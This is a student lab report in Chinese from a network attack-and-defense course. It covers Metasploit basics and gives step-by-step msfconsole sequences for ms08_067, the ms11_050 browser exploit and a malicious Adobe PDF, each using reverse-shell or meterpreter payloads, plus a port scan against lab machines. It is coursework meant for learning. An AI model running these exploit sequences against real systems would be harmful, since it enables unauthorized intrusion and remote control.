• # 2019-2020-2 网络对抗技术 20175333 曹雅坤 Exp6 MSF基础应用


    2019-2020-2 网络对抗技术 20175333 曹雅坤 Exp6 MSF基础应用

    实验内容

    • 一个主动攻击实践,如ms08_067;
    • 一个针对浏览器的攻击,如ms11_050;
    • 一个针对客户端的攻击,如Adobe;
    • 成功应用任何一个辅助模块。

    问题回答

    用自己的话解释什么是exploit,payload,encode.

    exploit是载具,连接漏洞,将payload传送到靶机中。
    payload是载荷,是exploit中shellcode中的主要功能代码,exploit把它送到靶机中后,是真正负责进行攻击代码。
    encode是编码,用来改变payload,避免payload中出现漏洞无法处理的字符;其次是为了实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

    实验原理

    1.MSF攻击方法

    • 主动攻击:扫描主机漏洞,进行攻击
    • 攻击浏览器
    • 攻击其他客户端

    2.MSF的六个模块

    查看六种模块源码目录/usr/share/metasploit-framework/modules

    • 渗透攻击模块Exploit Modules:攻击漏洞,把shellcode"背"过去

    • 辅助模块Auxiliary Modules:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提

    • 攻击载荷Payload Modules:载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码

    • 空字段模块Nop Modules

    • 编码模块Encoders

    • 后渗透攻击模块Post:攻击成功之后,动态传输代码使其在被控机执行

    3.MSF的三种用户操作界面

    • msfconsole - 查看模块的具体信息info [exploits|auxiliary|post|payloads|encoders|nops] - 查看设置信息show [options] - 查看攻击目标类型show [target] - 查找命令search - 查找2018年产生的在windows平台下的漏洞search ms18(或CNE:2018) type:exploit platform:windows
    • armitage - 启动服务器service postgresql start 启动armitagearmitage
    • webgui

    4.MSF常用漏洞利用命令

    search name:用指定关键字搜索可以利用的漏洞模块
    use exploit name:使用漏洞
    show options:显示配置选项
    set option name option:设置选项
    show payloads:回链攻击载荷
    show targets: 显示目标(os版本)
    set TARGET target number:设置目标版本
    exploit:开始漏洞攻击
    sessions -l:列出会话
    sessions -i id:选择会话
    sessions -k id:结束会话
    Ctrl+z:把会话放到后台
    Ctrl+c:结束会话
    show auxiliary:显示辅助模块
    use auxiliary name :使用辅助模块
    set option name option:设置选项
    exploit:运行模块

    实验任务

    1.主动攻击实例

    ms08-067

    • 测试靶机与攻击机之间能否ping通

    • 查看到靶机漏洞、

    • search ms08-067查看漏洞位置

    • show payloads查看可用payload

    • set payload generic/shell_reverse_tcp反向连接

    • 攻击结果

    2.一个针对浏览器的攻击
    ms11_50

    • search ms08-067查看漏洞位置
    • show payloads查看可用payload
    use windows/browser/ms11_050_mshtml_cobjectelement
    set payload windows/meterpreter/reverse_http 
    set LHOST 192.168.253.132
    set RHOST 192.168.253.130
    set LPORT 5333 
    set URIPATH 5333 
    exploit
    

    3.一个针对客户端的攻击

    msfconsole
    search adobe 
    use windows/fileformat/adobe_cooltype_sing
    info //查看漏洞具体信息
    set payload windows/meterpreter/reverse_tcp //选择攻击载荷
    show options //查看详细信息
    set LPORT 5333 //设置端口号
    set RHOST 192.168.253.130 //设置靶机IP地址
    exploit #攻击
    

    将生成的msf.pdf复制到Windows XP中
    kail中输入back退出当前模块,进入监听模块

    use exploit/multi/handler //进入监听模块
    set payload windows/meterpreter/reverse_tcp  //选择攻击载荷
    show options //查看详细信息
    set RHOST 192.168.253.130 //设置靶机IP地址
    set LPORT 5333 //设置端口号
    exploit //攻击
    

    在靶机中使用双击打开msf.pdf

    4.成功应用任何一个辅助模块。
    利用辅助模块查看端口是否开启
    search portscan # 搜索端口
    use auxiliary/scanner/portscan/tcp # 使用漏洞
    show options #显示设置
    set RHOSTS 192.168.253.130 # 设置监听者地址
    exploit # 攻击

    实验心得

    本次实验操作起来简单,逻辑清晰,不同的靶机有不同的漏洞。攻击时对操作系统和软件版本都有很高的要求。必须要在特定环境和特定触发条件下才能成功。现在都是一些最基础的攻击手段,要是开着防火墙就什么也做不到。

  • 相关阅读:
    [Debug] A strange error encountered today in ROS
    实操 | 安装一台3D打印机
    实操 | Getting started with Baxter Research Robot ...
    学习笔记 | What is Monocular Vision?
    路线图 | Roadmap of SLAM Research
    路线图 | Road-map of Cracking the Coding Interview as a C++ Developer
    实操 | Implementing Cartographer ROS on TurtleBots
    实操 | Implementing Google's Open Source Slam "Cartographer" demos in ROS / rviz
    科技新闻 | Google's Open Source SLAM Library ---- Cartographer
    实操 | Implementing "slam_karto" package on a Freight robot
  • 原文地址:https://www.cnblogs.com/Hf-Hf/p/12820381.html
Copyright © 2020-2023  润新知